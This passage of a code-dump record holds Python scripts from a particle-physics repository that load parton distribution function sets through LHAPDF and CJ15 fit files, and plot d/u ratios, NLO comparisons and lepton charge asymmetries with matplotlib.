p2\n\nCJ15=COMPOSER('CJ15_NLO_KP_AV18')\nMMHT14=COMPOSER('MMHT2014nlo68cl')\nJR14=COMPOSER('JR14NLO08VF')\nCT14=COMPOSER('CT14nlo')\n#NNPDF=COMPOSER4NNPDF('NNPDF30_nlo_as_0118')\n#ABM11=COMPOSER('abm11_4n_nlo')\n#HERA15=COMPOSER('HERAPDF15NLO_EIG')\n\nax=py.subplot(111)\nQ2=10\nX=np.linspace(1e-3,0.95,1000)\n\nct=plot_dou(ax,CT14,Q2,X,color='g',ls='-',T=1,hatch=None,alpha=0.7,facecolor='g',edgecolor='g')\nmmht=plot_dou(ax,MMHT14,Q2,X,color='y',ls='-',T=1,hatch=None,alpha=0.8,facecolor='y',edgecolor='y')\njr=plot_dou(ax,JR14,Q2,X,color='b',ls='-',T=10,hatch='..',alpha=0.7,facecolor='none',edgecolor='b')\ncj=plot_dou(ax,CJ15,Q2,X,color='r',ls='-',T=10,hatch=None,alpha=0.8,facecolor='r',edgecolor='r')\n#hera=plot_dou(ax,HERA15,Q2,X,color='k',ls='-',T=1,hatch='||',alpha=1.0,facecolor='none',edgecolor='k')\n#nnpdf=plot_dou(ax,NNPDF,Q2,X,color='k',ls='-',T=1,hatch='//',alpha=0.4,edgecolor='k')\n#abm=plot_dou(ax,ABM11,Q2,X,color='b',ls='-',T=10,hatch='...',alpha=0.7,facecolor='none',edgecolor='b')\n\n\n# legend\nH=[cj,mmht,ct,jr]\nL=[tex('CJ15'),tex('MMHT14'),tex('CT14'),tex('JR14')]\nax.legend(H,L,frameon=0,fontsize=20,loc=3,bbox_to_anchor=(0.5,0.57))\nax.set_ylabel(r'$d/u$',size=25)\nax.set_xlabel(r'$x$',size=25)\nax.set_xlim(0,0.95)\nax.set_ylim(0,1)\nax.tick_params(axis='both',labelsize=20)\npy.tight_layout()\npy.savefig('gallery/du0.pdf')\n" }, { "alpha_fraction": 0.5164535641670227, "alphanum_fraction": 0.5789142847061157, "avg_line_length": 25.214284896850586, "blob_id": "451f790370c49702a926444bb1693709a923c532", "content_id": "4aef2e0529addf0d406bc589e94b9ae8f5b88d22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4771, "license_type": "no_license", "max_line_length": 82, "num_lines": 182, "path": "/sharespace/codes/other/NLO.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import FITPACK\n\n\n# initialize PDF instances\nHERA15 =lhapdf.mkPDFs('HERAPDF15NLO_EIG')\nMMHT14 =lhapdf.mkPDFs('MMHT2014nlo68cl')\n#MSTW08 =lhapdf.mkPDFs('MSTW2008nlo68cl')\nJR14 =lhapdf.mkPDFs('JR14NLO08VF')\nCJ12min=lhapdf.mkPDFs('CJ12min')\nCT10 =lhapdf.mkPDFs('CT10nlo')\n\n# dictionary for PDG flav index\npdgmap= {'u':2,'d':1,'ub':-2,'db': -1,'s':3,'g':21}\n\n# function to access LHAPDF pdfs\ndef get_pdfs(flav,x,Q2,iset,grp):\n\n if flav!='du' and flav!='dbub': \n return grp[iset].xfxQ2(pdgmap[flav],x,Q2)\n\n elif flav=='du':\n\n if grp[iset].xfxQ2(pdgmap['u'],x,Q2)!=0.0:\n return grp[iset].xfxQ2(pdgmap['d'],x,Q2)/grp[iset].xfxQ2(pdgmap['u'],x,Q2)\n else:\n return 0.0\n\n elif flav=='dbub':\n\n if grp[iset].xfxQ2(pdgmap['ub'],x,Q2)!=0.0:\n return grp[iset].xfxQ2(pdgmap['db'],x,Q2)/grp[iset].xfxQ2(pdgmap['ub'],x,Q2)\n else:\n return 0.0\n\n else:\n print '*** ERROR: flav not defined ***'\n sys.exit()\n\n\n# load CJ15 from fitpack data \nCJ15 = {}\nCJ15['CJ15_AV18'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_AV18.pdf')\n\n# dictionary for labels\nlabmap = {}\nlabmap['u'] = '$xu$'\nlabmap['d'] = '$xd$'\nlabmap['ub'] = r'$x\\bar{u}$'\nlabmap['db'] = r'$x\\bar{d}$'\nlabmap['s'] = '$xs$'\nlabmap['g'] = '$xg$'\nlabmap['du'] = '$d/u$'\nlabmap['dbub'] = r'$\\bar{d}/\\bar{u}$'\n\n# dictionary for grp == groups \ngrpmap = {}\ngrpmap['HERA15'] = {'grp':HERA15,'color':'g--'}\ngrpmap['JR14'] = {'grp':JR14,'color':'g-'}\ngrpmap['MMHT14'] = {'grp':MMHT14,'color':'b-'}\n#grpmap['MSTW08'] = {'grp':MSTW08,'color':'b:'}\ngrpmap['CJ12min']= {'grp':CJ12min,'color':'k-.'}\ngrpmap['CT10'] = {'grp':CT10,'color':'r-.'}\n\n# dictionary for ylims \nymap = {}\nymap['u'] ={'min':0.0,'max':0.8}\nymap['d'] ={'min':0.0,'max':0.8}\nymap['du'] ={'min':0.0,'max':1.0}\nymap['dbub']={'min':0.6,'max':2.0}\nymap['ub']={'min':0.0,'max':0.6}\nymap['db']={'min':0.0,'max':0.6}\nymap['s'] ={'min':0.0,'max':0.6}\nymap['g'] ={'min':0.0,'max':10.0}\n\n# dictionary for plot location\nncols=2\nnrows=4\n\npy.figure(figsize=(ncols*4,nrows*2)) \ngs = gridspec.GridSpec(4,2) # specify plotting grid geometry\ngs.update(left=0.1,right=0.98,wspace=0.25,hspace=0.45,top=0.98,bottom=0.1)\ngrid = {}\ngrid['u'] = gs[0,0]\ngrid['d'] = gs[0,1]\ngrid['du'] = gs[1,0]\ngrid['dbub']= gs[1,1]\ngrid['ub']= gs[2,0]\ngrid['db']= gs[2,1]\ngrid['s'] = gs[3,0]\ngrid['g'] = gs[3,1]\n\n\n# setup kinematics\nQ2=10.0\niset=0\n\n\n# make plot\nfor flav in ['u','d','ub','db','s','g','du','dbub']:\n\n ax=py.subplot(grid[flav])\n\n for grp in ['CJ15','HERA15','MMHT14','JR14','CT10','CJ12min']:\n\n if grp=='CJ15':\n cj15 = CJ15['CJ15_AV18']\n X=cj15['Q2'][Q2]['x']\n if flav!='du' and flav!='dbub':\n central=cj15['Q2'][Q2]['x'+flav]\n error=cj15['Q2'][Q2]['err-x'+flav]*10\n elif flav=='du':\n central=cj15['Q2'][Q2]['d/u']\n error=cj15['Q2'][Q2]['err-d/u']*10\n elif flav=='dbub':\n central=cj15['Q2'][Q2]['db/ub']\n error=cj15['Q2'][Q2]['err-db/ub']*10\n\n #args={} \n #args['ax']=ax\n #args['x']=X\n #args['central']=central\n #args['lower']=central-error\n #args['upper']=central+error\n #args['central color']='r'\n #args['central line style']='-'\n #args['band color']='#FFFF00'\n #args['label']=tex(grp)\n #CJ_Legend = plot_band(args)\n p1,=ax.plot(X,central,'r-')\n p2=fill_between(X,central-error,central+error,ax=ax,\n facecolor='#FFFF00',\n edgecolor='#FFFF00',\n alpha=1.0,hatch=None)\n\n else:\n X=np.linspace(1e-3,0.95,1000)\n grp_=grpmap[grp]['grp']\n col=grpmap[grp]['color']\n ax.plot(X,[get_pdfs(flav,x,Q2,iset,grp_) for x in X],col,label=tex(grp))\n\n # make legend\n if flav=='d':\n H_,L_ = ax.get_legend_handles_labels()\n H=[(p2,p1)]\n L=[tex('CJ15')]\n for h in H_: H.append(h)\n for l in L_: L.append(l)\n ax.legend(H,L,loc=1,frameon=0,fontsize=9)\n ax.text(0.07,0.15,tex('NLO'),transform=ax.transAxes,size=15)\n\n\n # setup axis \n #if flav!='s' and flav!='g': ax.set_xticks([])\n ax.set_xlim(0.0,1.0)\n if flav=='dbub': ax.set_xlim(0.0,0.4)\n if flav=='ub' or flav=='db' or flav=='s' or flav=='g':\n ax.semilogx()\n ax.set_xlim(1e-3,1.0)\n\n ax.set_ylim(ymap[flav]['min'],ymap[flav]['max'])\n ax.set_xlabel('$x$',size=20)\n ax.set_ylabel(labmap[flav],size=20)\n\n # write info\n if flav=='u': \n ax.text(0.55,0.75,'$Q^2=$'+tex('~10~GeV^2'),\n transform=ax.transAxes,size=12)\n\n#py.show()\npy.savefig('plots/NLOfits.pdf')\n" }, { "alpha_fraction": 0.5803738236427307, "alphanum_fraction": 0.6249220967292786, "avg_line_length": 30.165048599243164, "blob_id": "3526de93b07154939eb6bb094506ce202f739768", "content_id": "39f7188e21439a6a2409245c6b9bdd317497e019", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3210, "license_type": "no_license", "max_line_length": 70, "num_lines": 103, "path": "/sharespace/codes/d_over_u.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nimport pandas as pd\nfrom master import COMPOSER,FITPACK\n\ndef plot(fname,ax,Q2,T=1,color='r',hatch='...',edgecolor='k',alpha=1):\n path='../CJ15data/FITS_dquark_series'\n DATA=FITPACK().get_PDFs(path+'/'+fname)\n D=DATA['Q2'][Q2]\n #print D.keys()\n #p1,=ax.plot(D['x'],D['d/u'],color+'-')\n p2=fill_between(D['x'],\n (D['d/u']-D['err-d/u']*T),\n (D['d/u']+D['err-d/u']*T),\n ax=ax,\n facecolor=color,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n #return (p2,p1)\n return p2\n\ndef main():\n\n T=10\n Q2=10.0\n ax=py.subplot(111)\n\n f1='ddat_D.pdf'\n f2='ddat_D_BNS.pdf'\n f3='ddat_D_BNS_Zrap.pdf'\n f4='ddat_D_BNS_Zrap_Lasy.pdf'\n f5='ddat_D_BNS_Zrap_Lasy_WCDF.pdf'\n f6='ddat_D_BNS_Zrap_Lasy_Wasy.pdf'\n g1='ddat_nonuk_D.pdf'\n g2='ddat_nonuk_D_BNS.pdf'\n g3='ddat_nonuk_D_BNS_Zrap.pdf'\n g4='ddat_nonuk_D_BNS_Zrap_Lasy.pdf'\n g5='ddat_nonuk_D_BNS_Zrap_Lasy_WCDF.pdf'\n g6='ddat_nonuk_D_BNS_Zrap_Lasy_Wasy.pdf'\n h1='ddat_noD.pdf'\n\n# plot d/u fig. 1\n pf1=plot(f1,ax,Q2,T,color='y',hatch=None,edgecolor='y',alpha=1.0)\n pf2=plot(f2,ax,Q2,T,color='g',hatch=None,edgecolor='g',alpha=1.0)\n pf4=plot(f4,ax,Q2,T,color='b',hatch=None,edgecolor='b',alpha=1.0)\n pf6=plot(f6,ax,Q2,T,color='r',hatch=None,edgecolor='r',alpha=1.0)\n\n# plot d/u fig. 2\n #pg6=plot(g6,ax,Q2,T,color='y',hatch='...',edgecolor='y',alpha=0.7)\n #ph1=plot(h1,ax,Q2,T,color='g',hatch=None,edgecolor='g',alpha=0.5)\n #pf6=plot(f6,ax,Q2,T,color='r',hatch=None,edgecolor='r',alpha=0.7)\n\n# plot d/u fig. ?\n #pf1=plot(g1,ax,Q2,T,color='y',hatch=None,edgecolor='y',alpha=0.5)\n #pf2=plot(g2,ax,Q2,T,color='g',hatch=None,edgecolor='g',alpha=0.5)\n #pf3=plot(g3,ax,Q2,T,color='m',hatch=None,edgecolor='m',alpha=1.0)\n #pf4=plot(g4,ax,Q2,T,color='b',hatch=None,edgecolor='b',alpha=1.0)\n #pf5=plot(g5,ax,Q2,T,color='k',hatch=None,edgecolor='k',alpha=1.0)\n #pf6=plot(g6,ax,Q2,T,color='r',hatch=None,edgecolor='r',alpha=1.0)\n\n\n H,L=[],[]\n# legend fig. 1\n H.append(pf1);L.append(tex('DIS\\ only'))\n H.append(pf2);L.append(tex('+\\ BONuS'))\n H.append(pf4);L.append(r'$+\\ \\ell\\ {\\rm asym}\\ (\\&\\ Z\\ {\\rm rap})$')\n H.append(pf6);L.append(r'$+\\ W\\ {\\rm asym}$')\n\n# legend fig. 2\n #H.append(pg6);L.append(tex('no\\ nuclear'))\n #H.append(ph1);L.append(tex('no\\ deuteron'))\n #H.append(pf6);L.append(tex('CJ15'))\n\n# legend fig. ?\n #H.append(pf1);L.append(tex('DIS\\ only'))\n #H.append(pf2);L.append(tex('+\\ BONuS'))\n #H.append(pf3);L.append(r'$+\\ Z\\ {\\rm rap})$')\n #H.append(pf4);L.append(r'$+\\ \\ell\\ {\\rm asym}$')\n #H.append(pf5);L.append(r'$+\\ W\\ {\\rm CDF}$')\n #H.append(pf6);L.append(r'$+\\ W\\ {\\rm asym}$')\n\n ax.legend(H,L,loc=1,frameon=0,fontsize=20,bbox_to_anchor=(0.95,1))\n ax.set_ylim(0.0,1.0)\n ax.set_xlim(0.0,0.95)\n ax.set_xlabel('$x$',size=25)\n ax.set_ylabel('$d/u$',size=25)\n py.tick_params(axis='both',labelsize=20)\n py.savefig('gallery/du1.pdf')\n\nif __name__=='__main__':\n\n main()\n" }, { "alpha_fraction": 0.542505145072937, "alphanum_fraction": 0.5778234004974365, "avg_line_length": 26.05555534362793, "blob_id": "7511eff10545e56ae783d2eab60e3fa7f346bf59", "content_id": "3ff52f7d87e534b1f99f62d70619c2c71de4a4b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2435, "license_type": "no_license", "max_line_length": 83, "num_lines": 90, "path": "/sharespace/codes/Lasy.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nimport pandas as pd\nfrom scipy.interpolate import interp1d\n\nclass LASY(object):\n\n def __init__(self):\n self.load_data()\n self.make_plot()\n\n def load_data(self):\n F=open('../CJ15data/CJ15_NLO_KP_AV18/CJ15_Wasym.dat')\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l for l in L if l!='']\n H=L[0].split()\n L=[l.split() for l in L[1:]]\n DF=pd.DataFrame(L,columns=H)\n DF=DF.convert_objects(convert_numeric=True)\n\n D={}\n D['cdfLasy05'] = DF[DF.ITYPE=='cdfLasy05']\n D['d0Lasy_e15']= DF[DF.ITYPE=='d0Lasy_e15']\n D['d0Lasy13'] = DF[DF.ITYPE=='d0Lasy13']\n self.D=D\n\n def make_plot(self):\n D=self.D\n ax=py.subplot(111)\n\n Y=D['d0Lasy_e15']['Y']\n T=D['d0Lasy_e15']['THEORY']\n ET=D['d0Lasy_e15']['ERROR']\n\n iT= interp1d(Y,T,kind='cubic')\n iET= interp1d(Y,ET, kind='cubic')\n Y=np.linspace(np.amin(Y),np.amax(Y),100)\n\n T=10\n p2=fill_between(Y,iT(Y)-iET(Y)*T,iT(Y)+iET(Y)*T,\n ax=ax,\n facecolor='yellow',\n edgecolor='yellow')\n p1,=ax.plot(Y,iT(Y),'r-')\n H=[(p2,p1)]\n L=[tex('CJ15')]\n\n dmap={}\n dmap['cdfLasy05'] = {'color':'g','marker':'d'}\n dmap['d0Lasy_e15'] = {'color':'b','marker':'o'}\n dmap['d0Lasy13'] = {'color':'c','marker':'^'}\n\n for k in D.keys():\n color=dmap[k]['color']\n marker=dmap[k]['marker']\n markersize=4\n p3=ax.errorbar(D[k]['Y'],D[k]['DATA'],\\\n yerr=D[k]['DERROR'],fmt=color+marker,mfc=color,mec=color,\\\n markersize=markersize,zorder=1,alpha=0.9)\n H.append(p3)\n #L.append(tex(k.replace('_','')))\n L=[tex('CJ15'),tex('CDF')+r'$\\ e$',tex('D\\O')+r'$\\ \\mu$',tex('D\\O')+r'$\\ e$']\n\n ax.set_xlabel(r'$\\eta_{\\ell}$',size=25)\n ax.set_ylabel(r'$A_{\\ell}$',size=25)\n\n ax.legend(H,L,frameon=0,loc=3,fontsize=22,numpoints=1)\n \n ###ax.text(0.5,0.8,tex('nrep=%d'%nrows),transform=ax.transAxes,size=20)\n py.tick_params(axis='both',labelsize=20)\n py.tight_layout()\n py.savefig('gallery/Lasy.pdf')\n py.close()\n\nif __name__=='__main__':\n\n LASY()\n" }, { "alpha_fraction": 0.5405846834182739, "alphanum_fraction": 0.5758615136146545, "avg_line_length": 28.296649932861328, "blob_id": "2abc837a0b50f72623f6dff6d02f6a289db89c0a", "content_id": "3b6169fb280a55e8d2fea2b2cb46d9dbb1e2a292", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6123, "license_type": "no_license", "max_line_length": 86, "num_lines": 209, "path": "/master.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nimport numpy as np\nimport pylab as py\nfrom tools import tex#, fill_between\nimport lhapdf\n\nclass FITPACK(object):\n\n def get_PDFs(self,fname):\n \n # load file into list\n F=open(fname,'r')\n L=F.readlines()\n F.close()\n\n # clean data\n L=[l.strip() for l in L]\n L=[l for l in L if l.startswith('#')==False]\n L=[l for l in L if l.startswith('-')==False]\n L=[l for l in L if l!='']\n\n # get blocks markers\n I=[]\n for i in range(len(L)):\n l=L[i]\n if 'Q2' in l and '=' in l: I.append(i)\n if 'x' in l and '=' in l: I.append(i)\n I.append(len(L))\n\n # get blocks\n BLOCKS=[]\n for k in range(len(I[:-1])):\n block=[]\n for i in range(I[k],I[k+1]):\n block.append(L[i])\n BLOCKS.append(block)\n\n # format blocks\n D={'Q2':{},'x':{}}\n for block in BLOCKS:\n \n key,val = block[0].split('=')\n val=float(val)\n\n H_=block[1].split()\n H=[H_[0]]\n for h in H_[1:]: \n H.append(h)\n H.append('err-'+h)\n\n \n data={}\n data_=block[2:]\n data_=np.transpose([[float(x) for x in l.split()] for l in data_])\n for i in range(len(H)):\n data[H[i]]=data_[i]\n\n D[key][val]=data\n\n return D\n\nclass COMPOSER(object):\n\n def __init__(self,name,X=[None],central_only=False):\n\n self.name=name\n self.central_only=central_only\n if central_only==True:\n self.central=lhapdf.mkPDF(name,0)\n else:\n self.SETS=lhapdf.mkPDFs(name)\n if X[0]==None: self.X=np.linspace(1e-3,0.99,1000)\n else: self.X=X\n\n def map_X(self):\n f=lambda x: x**5\n X=self.X\n m=(X[0]-X[-1])/(f(X[0])-f(X[-1]))\n b=X[0]-m*f(X[0])\n self.X=m*f(X)+b\n\n def _get_xpdf(self,Set,flav,x,Q2):\n if flav=='g': return Set.xfxQ2(21,x,Q2)\n elif flav=='u': return Set.xfxQ2(2,x,Q2)\n elif flav=='d': return Set.xfxQ2(1,x,Q2)\n elif flav=='s': return Set.xfxQ2(3,x,Q2)\n elif flav=='db+ub': return Set.xfxQ2(-2,x,Q2)+Set.xfxQ2(-1,x,Q2)\n elif flav=='db-ub': return Set.xfxQ2(-1,x,Q2)-Set.xfxQ2(-2,x,Q2)\n elif flav=='ub': return Set.xfxQ2(-2,x,Q2)\n elif flav=='db': return Set.xfxQ2(-1,x,Q2)\n\n def _get_xpdf_central(self,flav,x,Q2):\n if flav=='g': return self.central.xfxQ2(21,x,Q2)\n elif flav=='u': return self.central.xfxQ2(2,x,Q2)\n elif flav=='d': return self.central.xfxQ2(1,x,Q2)\n elif flav=='s': return self.central.xfxQ2(3,x,Q2)\n elif flav=='db+ub': return self.central.xfxQ2(-2,x,Q2)+self.central.xfxQ2(-1,x,Q2)\n elif flav=='db-ub': return self.central.xfxQ2(-1,x,Q2)-self.central.xfxQ2(-2,x,Q2)\n elif flav=='ub': return self.central.xfxQ2(-2,x,Q2)\n elif flav=='db': return self.central.xfxQ2(-1,x,Q2)\n\n def _error(self,message):\n print 'ERR '+message\n sys.exit()\n\n def _get_symmetric_errors(self,OBS):\n n=len(OBS)-1\n feven=np.array([OBS[2*i] for i in range(1,n/2)])\n fodd=np.array([OBS[2*i-1] for i in range(1,n/2)])\n df=np.zeros(feven[0].size)\n for i in range(n/2-1):\n df+=(fodd[i]-feven[i])**2\n return df**0.5/2\n\n def _get_asymmetric_errors(self,OBS):\n n=len(OBS)-1\n f0=np.array(OBS[0])\n feven=np.array([OBS[2*i] for i in range(1,n/2)])\n fodd=np.array([OBS[2*i-1] for i in range(1,n/2)])\n dfeven=feven-f0\n dfodd=fodd-f0\n zeros=np.zeros(f0.size)\n dfP=np.zeros(f0.size)\n dfM=np.zeros(f0.size)\n for i in range(n/2-1):\n dfP+=np.amax([dfodd[i],dfeven[i],zeros],0)**2\n dfM+=np.amax([-dfodd[i],-dfeven[i],zeros],0)**2\n return dfP**0.5,dfM**0.5\n\n def get_xpdf(self,flav=None,X=None,Q2=None):\n if flav==None: self._error('specify flav')\n if X==None: X=self.X\n if Q2==None: self._error('specify Q2')\n D={}\n if self.central_only:\n D['xf0']=np.array([self._get_xpdf_central(flav,x,Q2) for x in X])\n D['dxf']=np.zeros(X.size)\n D['dxf+']=np.zeros(X.size)\n D['dxf-']=np.zeros(X.size)\n else:\n PDFS=[[self._get_xpdf(Set,flav,x,Q2) for x in X] for Set in self.SETS]\n D['xf0']=np.array(PDFS[0])\n D['dxf']=self._get_symmetric_errors(PDFS)\n D['dxf+'],D['dxf-']=self._get_asymmetric_errors(PDFS)\n return D\n\n def get_dou(self,X=None,Q2=None):\n if X==None: X=self.X\n if Q2==None: self._error('specify Q2')\n D={}\n d=lambda Set,x,Q2: self._get_xpdf(Set,'d',x,Q2) \n u=lambda Set,x,Q2: self._get_xpdf(Set,'u',x,Q2) \n OBS=[[d(Set,x,Q2)/u(Set,x,Q2) for x in X] for Set in self.SETS]\n D['central']=np.array(OBS[0])\n D['sym err']=self._get_symmetric_errors(OBS)\n D['asym err +'],D['asym err -']=self._get_asymmetric_errors(OBS)\n return D\n\nclass COMPOSER4NNPDF(object):\n\n def __init__(self,name):\n\n self.name=name\n self.SETS=lhapdf.mkPDFs(name)\n\n def _get_xpdf(self,Set,flav,x,Q2):\n if flav=='g': return Set.xfxQ2(21,x,Q2)\n elif flav=='u': return Set.xfxQ2(2,x,Q2)\n elif flav=='d': return Set.xfxQ2(1,x,Q2)\n elif flav=='s': return Set.xfxQ2(3,x,Q2)\n elif flav=='db+ub': return Set.xfxQ2(-2,x,Q2)+Set.xfxQ2(-1,x,Q2)\n elif flav=='db-ub': return Set.xfxQ2(-1,x,Q2)-Set.xfxQ2(-2,x,Q2)\n elif flav=='ub': return Set.xfxQ2(-2,x,Q2)\n elif flav=='db': return Set.xfxQ2(-1,x,Q2)\n\n def _error(self,message):\n print 'ERR '+message\n sys.exit()\n\n def get_xpdf(self,flav=None,X=None,Q2=None):\n if flav==None: self._error('specify flav')\n if X==None: X=self.X\n if Q2==None: self._error('specify Q2')\n D={}\n PDFS=[[self._get_xpdf(Set,flav,x,Q2) for x in X] for Set in self.SETS]\n D['xf0']=np.mean(PDFS,axis=0)\n D['dxf+']=np.var(PDFS,axis=0)**0.5\n D['dxf-']=np.var(PDFS,axis=0)**0.5\n return D\n\n def get_dou(self,X=None,Q2=None):\n if X==None: X=self.X\n if Q2==None: self._error('specify Q2')\n D={}\n d=lambda Set,x,Q2: self._get_xpdf(Set,'d',x,Q2) \n u=lambda Set,x,Q2: self._get_xpdf(Set,'u',x,Q2) \n OBS=[[d(Set,x,Q2)/u(Set,x,Q2) for x in X] for Set in self.SETS]\n D['central']=np.mean(OBS,axis=0)\n D['asym err +']=np.var(OBS,axis=0)**0.5\n D['asym err -']=np.var(OBS,axis=0)**0.5\n return D\n\n\nif __name__==\"__main__\" :\n\n CJ=COMPOSER(name='CJ12min')\n CJ.map_X() # optional\n print CJ.get_xpdf('g',Q2=10.0)\n" }, { "alpha_fraction": 0.6549450755119324, "alphanum_fraction": 0.6813187003135681, "avg_line_length": 23.781818389892578, "blob_id": "8849f8a843cae991282550bf0a2a7c1ecff2f6d4", "content_id": "1e4a802b4940d71a4c5a330463755a9b2a506dfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1365, "license_type": "no_license", "max_line_length": 91, "num_lines": 55, "path": "/sharespace/codes/other/advanced.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport lhapdf\nfrom tools import tex, fill_between\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import FITPACK, COMPOSER\n \n# define x values\nX=np.linspace(1e-3,0.9,1000)\n\n# initialize composer\nCJ=COMPOSER(name='CJ12min',X=X)\n#CJ.map_X() # optional\n\n# get glue \n# note: the output is a dictionary where\n# key='f0' -> central PDF\n# key='df' -> symmetric error\n# key='df+' -> asymmetric error (+)\n# key='df0' -> asymmetric error (-)\nu=CJ.get_xpdf(flav='u',Q2=10.0)\nprint u.keys()\n\n\n# these lines add latex typefont.\n# is kind of slow, so uncomment while a plot is been coded\n#from matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n#rc('text', usetex=True) \n\n# create matplotlib instance\nax=py.subplot(111)\n\n# plot error band\nT=10.0\nUP=u['f0']+T*u['df+']\nDO=u['f0']-T*u['df-']\nfill_between(X,DO,UP,ax=ax,label=tex('u'),facecolor='r',edgecolor='r',alpha=0.5,hatch=None)\n\n# plot central\nax.plot(X,u['f0'],'r-',label=tex('u'))\n\n# makeup\nax.legend(loc=3,frameon=0,fontsize=20)\nax.semilogx()\nax.set_xlabel(tex('x'),size=20)\nax.set_ylabel(tex('xPDF(x)'),size=20)\npy.tight_layout()\npy.savefig('plots/advanced.pdf')\n\n\n" }, { "alpha_fraction": 0.5781383514404297, "alphanum_fraction": 0.6020495295524597, "avg_line_length": 17.03125, "blob_id": "1257acae9bd295d3be43e3fe88b40e1654b8df0f", "content_id": "a8af287211318d86b724e8086e91ee256a557d13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 54, "num_lines": 64, "path": "/sharespace/codes/other/fitpack_data.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nfrom master import FITPACK\n\n\nfitpack=FITPACK()\n\ndata=fitpack.get_PDFs('CDBONN_KP_1_LO_6.pdf')\n\n\n\n#import numpy as np\n#import pylab as py\n#\n## define filepath\n#path='/u/group/cteqX/wmelnitc/fits/CJ15'\n#fname='CDBONN_KP_1_LO_6.pdf'\n#\n## load file into list L\n#F=open(fname,'r')\n#L=F.readlines()\n#F.close()\n#\n## isolate Q2=10.0 data\n#TL=[]\n#flag=False\n#for l in L:\n# if 'Q2=' in l and '10.00' in l: flag=True\n# if 'Q2=' in l and '25.00' in l: flag=False\n# if flag==True:\n# TL.append(l) \n#L=TL\n#\n## remove spaces, newlines etc\n#L=[l.strip() for l in L]\n## split each line separated by spaces\n#L=[l.split() for l in L]\n## rm empty lists\n#L=[l for l in L if l!=[]]\n#\n## get headers\n#H=L[1]\n#\n## get matrix of data\n#data=L[2:]\n#data=[[float(x) for x in l] for l in data ]\n#data=np.array(data)\n#data=np.transpose(data)\n## data = [[values of 'X'],[ values of 'xu'],...] \n#\n## construct dictionary\n#D={}\n#for i in range(len(H)):\n# D[H[i]] = data[i]\n#\n##print D.keys()\n##print D['xg']\n#\n#\n#ax=py.subplot(111)\n#ax.errorbar(D['X'],D['xu'],yerr=10*D['Dxu'],fmt='k.')\n#py.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6015995740890503, "alphanum_fraction": 0.6238440275192261, "avg_line_length": 25.065359115600586, "blob_id": "a625f5ed0717e6ee052498c18887163471828a1d", "content_id": "ed1be50a8c0ca05d31292603c486fffd07e618e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4001, "license_type": "no_license", "max_line_length": 72, "num_lines": 153, "path": "/sharespace/codes/other/loglin.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nimport numpy as np\nimport time\nimport fnmatch\nimport cPickle \nfrom operator import mul\nimport pylab as py\nimport matplotlib.patches as mpatches\n#from line_profiler import LineProfiler\n\ndef tex(x):\n return r'$\\mathrm{'+x+'}$'\n\ndef add_subplot_axes(ax,rect,axisbg='w'):\n fig = py.gcf()\n box = ax.get_position()\n width = box.width\n height = box.height\n inax_position = ax.transAxes.transform(rect[0:2])\n transFigure = fig.transFigure.inverted()\n infig_position = transFigure.transform(inax_position) \n x = infig_position[0]\n y = infig_position[1]\n width *= rect[2]\n height *= rect[3] # <= Typo was here\n subax = fig.add_axes([x,y,width,height],axisbg=axisbg)\n x_labelsize = subax.get_xticklabels()[0].get_size()\n y_labelsize = subax.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2]**0.5\n y_labelsize *= rect[3]**0.5\n subax.xaxis.set_tick_params(labelsize=x_labelsize)\n subax.yaxis.set_tick_params(labelsize=y_labelsize)\n return subax\n\nclass SPLIT_AX(object):\n\n def __init__(self,ax):\n self.ax=ax\n self.get_LR(ax)\n self.is_ylim_set=False\n\n def get_LR(self,ax,xlabel='x-label',ylabel='y-label'):\n\n ax.axis('off')\n axisbg='w'\n \n 